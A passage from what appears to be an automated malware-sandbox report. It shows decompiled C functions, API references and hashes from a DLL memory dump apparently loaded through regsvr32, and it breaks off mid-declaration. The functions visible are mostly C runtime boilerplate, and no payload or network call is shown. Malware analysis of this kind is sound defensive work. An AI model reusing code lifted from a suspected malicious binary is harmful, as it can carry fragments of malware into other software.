                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,736DC31E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDDB7
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 736DDDF7
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDEA3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4031098158-0
                                                                                                                                                                                                                                • Opcode ID: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction ID: 478704e6cb27ff5b10fd0181870b68765d82861f3ddcd779b127fcb5b8cdcf05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D1CE76D112989FDF11DFE8C980AEDBBB5FF49310F28015AE956BB281D730A906CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D8137(void* __ecx) {
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = __ecx;
                                                                                                                                                                                                                                				if( *0x736eb020 != 0xffffffff) {
                                                                                                                                                                                                                                					_t24 = GetLastError();
                                                                                                                                                                                                                                					_t11 = E736D898D(_t13, __eflags,  *0x736eb020);
                                                                                                                                                                                                                                					_t14 = _t23;
                                                                                                                                                                                                                                					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						_t11 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						__eflags = _t11;
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							_t4 = E736D89C8(_t14, __eflags,  *0x736eb020, 0xffffffff);
                                                                                                                                                                                                                                							__eflags = _t4;
                                                                                                                                                                                                                                							if(_t4 != 0) {
                                                                                                                                                                                                                                								_push(0x28);
                                                                                                                                                                                                                                								_t27 = E736D9908();
                                                                                                                                                                                                                                								_t18 = 1;
                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                									L8:
                                                                                                                                                                                                                                									_t11 = 0;
                                                                                                                                                                                                                                									E736D89C8(_t18, __eflags,  *0x736eb020, 0);
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t8 = E736D89C8(_t18, __eflags,  *0x736eb020, _t27);
                                                                                                                                                                                                                                									_pop(_t18);
                                                                                                                                                                                                                                									__eflags = _t8;
                                                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                                                										_t11 = _t27;
                                                                                                                                                                                                                                										_t27 = 0;
                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E736D9721(_t27);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					SetLastError(_t24);
                                                                                                                                                                                                                                					return _t11;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,736D7CA5,736D74C3,736D6EDC,?,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D), ref: 736D8145
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 736D8153
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 736D816C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D,?,00000001,?), ref: 736D81BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction ID: 02efab8df2a6382d2f725095310dc715f54188fb4d11c6f5fdecb592459af44e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4301283366C3175EFB052676AC8CB5A2FA8EB05E713300329E129961D5FF22180D5144
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DAB09(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                                				intOrPtr* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t38 = _a4;
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					__eflags =  *_t38;
                                                                                                                                                                                                                                					if( *_t38 != 0) {
                                                                                                                                                                                                                                						_t14 = E736DB595(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                                                                                						__eflags = _t14;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							_t36 = _a8;
                                                                                                                                                                                                                                							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
                                                                                                                                                                                                                                							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                								_t15 = E736DB595(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
                                                                                                                                                                                                                                								__eflags = _t15;
                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
                                                                                                                                                                                                                                									_t17 = 0;
                                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									E736DA1ED(GetLastError());
                                                                                                                                                                                                                                									_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L13:
                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                								return _t17;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t17 = E736DABD0(_t36, _t14);
                                                                                                                                                                                                                                							__eflags = _t17;
                                                                                                                                                                                                                                							if(_t17 != 0) {
                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L10;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA1ED(GetLastError());
                                                                                                                                                                                                                                						_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t39 + 0xc));
                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
                                                                                                                                                                                                                                						_t17 = 0;
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t39 + 0x10)) = 0;
                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t17 = E736DABD0(_t39, 1);
                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736DABF7(_a8);
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 736DAB0E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                • API String ID: 0-3922119987
                                                                                                                                                                                                                                • Opcode ID: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction ID: a2c6762b99dba583604e148ca0d4e46b457bccef109de54f29a85d27c6923ba1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40218E72638205AFEF119F71DD80F5A7BBFAB402A87144614E52ADB3C0EB31DD5287A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8834(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				WCHAR* _v8;
                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                				WCHAR* _t12;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t18;
                                                                                                                                                                                                                                				signed int* _t22;
                                                                                                                                                                                                                                				signed int* _t26;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t29;
                                                                                                                                                                                                                                				WCHAR* _t31;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t26 = _a4;
                                                                                                                                                                                                                                				while(_t26 != _a8) {
                                                                                                                                                                                                                                					_t11 =  *_t26;
                                                                                                                                                                                                                                					_t22 = 0x736ef518 + _t11 * 4;
                                                                                                                                                                                                                                					_t29 =  *_t22;
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						_t12 =  *(0x736e1b00 + _t11 * 4);
                                                                                                                                                                                                                                						_v8 = _t12;
                                                                                                                                                                                                                                						_t29 = LoadLibraryExW(_t12, 0, 0x800);
                                                                                                                                                                                                                                						if(_t29 != 0) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							 *_t22 = _t29;
                                                                                                                                                                                                                                							if( *_t22 != 0) {
                                                                                                                                                                                                                                								FreeLibrary(_t29);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                							_t16 = _t29;
                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                							return _t16;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = GetLastError();
                                                                                                                                                                                                                                						if(_t18 != 0x57) {
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							 *_t22 = _t18 | 0xffffffff;
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t26 =  &(_t26[1]);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t31 = _v8;
                                                                                                                                                                                                                                						_t18 = E736D9913(_t31, L"api-ms-", 7);
                                                                                                                                                                                                                                						_t32 = _t32 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = LoadLibraryExW(_t31, 0, 0);
                                                                                                                                                                                                                                						_t29 = _t18;
                                                                                                                                                                                                                                						if(_t29 != 0) {
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t29 != 0xffffffff) {
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D88F5,00000000,?,00000001,00000000,?,736D896C,00000001,FlsFree,736E1BBC,FlsFree,00000000), ref: 736D88C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                • Opcode ID: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction ID: 5d2e58dd57d7c3d07b60fc2566b4470bb635626ff78098474deb944e90907e93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11CA72E61620EBDF139B69CD4CB4933B9AF41B71F290251E916FB1C4D770E90486D4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E736D8E50(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				_t8 =  &_v8;
                                                                                                                                                                                                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                                                                                                                                                                                                				if(_t8 != 0) {
                                                                                                                                                                                                                                					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                                                                                                                                                                                                					_t14 = _t8;
                                                                                                                                                                                                                                					if(_t14 != 0) {
                                                                                                                                                                                                                                						 *0x736e1104(_a4);
                                                                                                                                                                                                                                						_t8 =  *_t14();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					return FreeLibrary(_v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E65
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 736D8E78
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E9B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction ID: 176e972b41e59aed32b431ad836198e4bbf432327f2d2d4b1fd7f101123bfb0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F05E76A51218FBCF01AB52CE0DB9E7A78FB01B56F204190EC0AE6194CB744E04EA91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DE977(intOrPtr* _a4) {
                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t21 = _a4;
                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                					_t23 =  *_t21 -  *0x736eb6f8; // 0x736eb748
                                                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x736eb6fc; // 0x736efb20
                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t8);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x736eb700; // 0x736efb20
                                                                                                                                                                                                                                					if(_t25 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t9);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x736eb728; // 0x736eb74c
                                                                                                                                                                                                                                					if(_t26 != 0) {
                                                                                                                                                                                                                                						E736DA293(_t10);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                					_t27 = _t6 -  *0x736eb72c; // 0x736efb24
                                                                                                                                                                                                                                					if(_t27 != 0) {
                                                                                                                                                                                                                                						return E736DA293(_t6);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t6;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE98F
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9A1
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9B3
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9C5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9D7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction ID: f29c1593be9b63d06d2dc35ea2a833e974e703468a758a93678c0f7635191466
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09C769693009BCF45DB66D689F1633E9FA007107780919F09FDB7C0C735F99086A8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736DA485(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				signed int _v6;
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                				intOrPtr* _v72;
                                                                                                                                                                                                                                				intOrPtr* _v104;
                                                                                                                                                                                                                                				intOrPtr* _v108;
                                                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                                                				signed int _v124;
                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                                                                				char _v609;
                                                                                                                                                                                                                                				intOrPtr* _v616;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v620;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v624;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v628;
                                                                                                                                                                                                                                				signed int _v632;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v636;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v640;
                                                                                                                                                                                                                                				signed int _v644;
                                                                                                                                                                                                                                				signed int _v648;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v652;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v656;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v660;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v664;
                                                                                                                                                                                                                                				signed int _v668;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v672;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v676;
                                                                                                                                                                                                                                				intOrPtr _v724;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				intOrPtr* _t131;
                                                                                                                                                                                                                                				signed int _t132;
                                                                                                                                                                                                                                				signed int _t134;
                                                                                                                                                                                                                                				signed int _t139;
                                                                                                                                                                                                                                				signed int _t140;
                                                                                                                                                                                                                                				intOrPtr* _t150;
                                                                                                                                                                                                                                				signed int _t152;
                                                                                                                                                                                                                                				intOrPtr _t153;
                                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                                				signed int _t159;
                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                                                				char _t168;
                                                                                                                                                                                                                                				signed char _t169;
                                                                                                                                                                                                                                				signed int _t175;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t179;
                                                                                                                                                                                                                                				signed int _t185;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t188;
                                                                                                                                                                                                                                				intOrPtr* _t196;
                                                                                                                                                                                                                                				signed int _t199;
                                                                                                                                                                                                                                				intOrPtr _t204;
                                                                                                                                                                                                                                				signed int _t206;
                                                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                                                				signed int _t211;
                                                                                                                                                                                                                                				signed int _t212;
                                                                                                                                                                                                                                				signed int _t213;
                                                                                                                                                                                                                                				signed int _t215;
                                                                                                                                                                                                                                				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
